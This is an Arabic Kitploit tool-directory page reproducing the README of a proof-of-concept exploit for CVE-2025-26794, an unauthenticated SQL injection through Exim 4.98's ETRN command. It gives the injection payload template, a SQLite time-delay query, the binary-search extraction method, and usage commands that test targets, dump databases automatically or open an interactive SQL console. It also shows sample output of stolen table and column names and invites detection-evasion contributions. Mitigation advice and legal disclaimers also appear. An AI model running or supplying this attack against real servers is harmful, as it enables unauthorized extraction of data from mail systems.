Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

استغلال ثغرة حقن SQL لـ CVE-2025-26794 في Exim 4.98. استخراج آلي للبيانات عبر حقن SQL أعمى قائم على الوقت. لاختبارات الاختراق المصرح بها فقط.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

CVE-2025-26794: أداة استغلال حقن SQL في أمر ETRN بخادم Exim

Python Version License Status

أداة استغلال من نوع إثبات المفهوم (PoC) لثغرة CVE-2025-26794، توضح ثغرة حقن SQL في خادم البريد Exim 4.98 عبر أمر ETRN عند استخدام تخزين SQLite DBM.

⚠️ إخلاء مسؤولية قانوني

لأغراض اختبار الاختراق المصرح به فقط

تم توفير هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قوانين مختلفة تشمل:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) في الولايات المتحدة
  • قانون إساءة استخدام الحاسوب في المملكة المتحدة
  • تشريعات مماثلة في ولايات قضائية أخرى

يجب أن يكون لديك إذن كتابي صريح قبل اختبار أي نظام لا تملكه.

لا يتحمل المؤلفون والمساهمون أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه الأداة.

📋 نظرة عامة على الثغرة

CVE-2025-26794 هي ثغرة حقن SQL في Exim 4.98 تحدث عندما:

  • يتم تكوين Exim مع تخزين SQLite DBM
  • يعالج معالج أمر ETRN البيانات المتسلسلة
  • لا يتم تنقية المدخلات التي يتحكم فيها المستخدم بشكل كافٍ قبل إنشاء استعلام SQL

تسمح هذه الثغرة للمهاجمين بـ:

  • استخراج بيانات حساسة من قاعدة بيانات خادم البريد
  • تنفيذ هجمات حقن SQL أعمى قائمة على الوقت
  • تعداد بنية قاعدة البيانات (الجداول، الأعمدة، البيانات)

الإصدارات المتأثرة

  • Exim 4.98 مع تكوين SQLite DBM

ناقل الهجوم

  • خدمة SMTP المتاحة عبر الشبكة (غالبًا المنفذ 25)
  • لا يتطلب مصادقة (أمر ETRN متاح قبل المصادقة)

🚀 الميزات

  • اختبار الثغرة: فحص آلي لتأكيد ما إذا كان الهدف معرضًا للثغرة
  • حقن SQL أعمى قائم على الوقت: يستخدم تقنيات تأخير الوقت في SQLite لاستخراج البيانات
  • تحسين البحث الثنائي: استخراج فعال حرفًا بحرف
  • تفريغ قاعدة البيانات آليًا: يستخرج الجداول والأعمدة وبيانات العينة
  • الوضع التفاعلي: تنفيذ استعلامات SQL مخصصة بشكل تفاعلي
  • تشغيل متعدد الأوضاع: استراتيجيات استخراج مرنة

📦 التثبيت

المتطلبات

  • Python 3.6 أو أحدث
  • وصول شبكي إلى خادم SMTP الهدف

الإعداد

root@kitploit:~
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

💻 الاستخدام

الصيغة الأساسية

root@kitploit:~
python3 exploit.py <target> [options]

أمثلة سريعة

1. اختبار ما إذا كان الهدف معرضًا للثغرة

root@kitploit:~
python3 exploit.py 192.168.1.10 --test-only

2. تفريغ قاعدة البيانات آليًا

root@kitploit:~
python3 exploit.py mail.example.com --auto-dump

3. وضع استعلام SQL التفاعلي

root@kitploit:~
python3 exploit.py 10.0.0.5 --interactive

4. استخراج بنية جدول محدد

root@kitploit:~
python3 exploit.py 192.168.1.10 --table users --columns

5. تنفيذ استعلام SQL مخصص

root@kitploit:~
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"

خيارات سطر الأوامر

🔍 كيف يعمل

تسلسل الهجوم

  1. الاتصال: إنشاء اتصال SMTP بالخادم الهدف
  2. قياس الأساس: إرسال أمر ETRN عادي لقياس زمن الاستجابة
  3. اختبار الحقن: إرسال حمولة SQL بتأخير زمني لتأكيد الثغرة
  4. استخراج البيانات: استخدام البحث الثنائي مع حقن SQL الأعمى القائم على الوقت لاستخراج البيانات حرفًا بحرف

بنية حمولة حقن SQL

root@kitploit:~
ETRN #',1); <MALICIOUS_QUERY> /*

تستغل الحمولة عدم التنقية السليمة في معالج تسلسل ETRN، مما يسمح بحقن SQL في استعلامات SQLite.

الكشف القائم على الوقت

يستخدم تأخيرًا زمنيًا خاصًا بـ SQLite:

root@kitploit:~
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))

يؤدي هذا إلى إنشاء تأخير قابل للقياس (~1-2 ثانية) عندما يكون الشرط صحيحًا.

📊 مثال على المخرجات

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email

🛡️ التخفيف

إذا كنت تشغّل Exim 4.98 مع SQLite DBM:

  1. تحديث Exim: الترقية إلى الإصدار المصحح (4.98.1 أو أحدث)
  2. التحقق من المدخلات: تنفيذ تحقق صارم من أمر ETRN
  3. الاستعلامات المبرمجة: استخدام عبارات مُعدّة مسبقًا لجميع عمليات قاعدة البيانات
  4. قواعد جدار الحماية: تقييد الوصول إلى SMTP على الشبكات الموثوقة
  5. تعطيل ETRN: إذا لم يكن مطلوبًا، قم بتعطيل أمر ETRN في تكوين Exim

🔧 تفاصيل تقنية

خوارزمية البحث الثنائي

يستخدم الاستغلال البحث الثنائي لاستخراج الأحرف بكفاءة:

  • نطاق ASCII القابل للطباعة: 32-126
  • متوسط الاستعلامات لكل حرف: ~7 (log₂ 94)
  • محسّن لتقليل حركة مرور الشبكة

دوال SQLite المستخدمة

  • unicode(): الحصول على قيمة ASCII للحرف
  • substr(): استخراج سلسلة فرعية من النتيجة
  • sqlite_master: جدول النظام لتعداد المخطط
  • pragma_table_info(): استخراج بيانات وصف الأعمدة

📚 المراجع

  • تفاصيل CVE: CVE-2025-26794
  • نشرة Exim الأمنية: [نشرة Exim الأمنية الرسمية]
  • OWASP حقن SQL: دليل OWASP

🤝 المساهمة

المساهمات مرحب بها في:

  • تحسينات الأداء
  • تقنيات استخراج إضافية
  • أساليب تفادي الكشف
  • إصلاح الأخطاء والتحسينات

يرجى التأكد من أن جميع المساهمات تتضمن:

  • توثيقًا واضحًا
  • إرشادات الإفصاح المسؤول
  • تحذيرات الاستخدام القانوني

📝 الترخيص

تم إصدار هذا المشروع لأغراض تعليمية فقط. استخدمه بمسؤولية وقانونية.

👤 المؤلف

XploitGh0st

  • GitHub: @XploitGh0st

🙏 شكر وتقدير

  • فريق تطوير Exim للتعامل المسؤول مع الثغرة
  • مجتمع أبحاث الأمن
  • باحثو تقنية حقن SQL القائم على الوقت في SQLite

⚖️ الإفصاح المسؤول

إذا اكتشفت ثغرات باستخدام هذه الأداة:

  1. لا تكشف التفاصيل علنًا على الفور
  2. تواصل مع البائع/المطوّر بشكل خاص
  3. امنح وقتًا معقولًا للتصحيح (عادةً 90 يومًا)
  4. اتبع إرشادات الإفصاح المنسق

تذكر: القوة العظمى تأتي مع مسؤولية عظيمة. استخدم هذه الأداة بأخلاقية وقانونية.

تنزيل الأداة
الخيارالوصف
hostاسم المضيف أو عنوان IP الهدف (مطلوب)
-p, --portمنفذ SMTP (الافتراضي: 25)
-t, --timeoutمهلة المقبس بالثواني (الافتراضي: 30)
--thresholdعتبة تأخير الوقت للكشف (الافتراضي: 0.8 ثانية)
--test-onlyاختبار الثغرة فقط دون استخراج بيانات
--auto-dumpتفريغ بنية وبيانات قاعدة البيانات تلقائيًا
--interactiveتشغيل وحدة تحكم استعلامات SQL تفاعلية
--table TABLEاستهداف جدول محدد للاستخراج
--columnsاستخراج أسماء الأعمدة (يُستخدم مع --table)
--query QUERYتنفيذ استعلام SQL مخصص